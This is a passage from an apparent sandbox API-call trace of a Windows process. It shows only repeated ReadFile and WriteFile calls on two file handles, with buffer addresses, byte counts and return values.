lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.213] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.214] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.216] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.217] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.217] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.217] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.218] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.219] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.220] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.220] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.221] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.222] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.223] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.225] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.226] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.226] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.227] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.227] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.228] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.228] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.229] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.229] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.231] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.231] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.232] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.232] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.233] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.234] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.234] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.235] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.236] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.236] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.237] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.237] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.238] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.239] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.239] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.240] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.240] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.241] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.241] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.242] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.243] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.243] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.244] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.244] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.247] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x12f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.248] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.250] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.251] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x191, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.251] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.253] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.253] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x185, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.254] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.256] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.256] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x159, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.257] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.258] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, 